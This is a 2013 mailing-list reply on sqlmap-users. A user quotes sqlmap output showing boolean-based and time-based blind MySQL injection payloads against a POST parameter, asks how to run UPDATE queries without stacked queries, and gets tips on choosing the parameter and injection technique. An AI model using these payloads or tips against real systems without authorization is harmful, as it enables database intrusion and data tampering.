Re: [sqlmap-users] stacked queries and different injection points

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

On Monday, February 18, 2013, Bruno Garcia wrote:

> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
>     Type: boolean-based blind
>     Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
>     Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
>     Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 OR time-based blind
>     Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
>     Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>

Hello,

I am not at a computer now, so this is out of my head.
If you want to test a specific parameter, use -p parameter_name , if you
want to use a specific injection type that was detected, use --type=E as an
example for error based injection.

-- 
Regards
L.

Sent using electronic mail ツ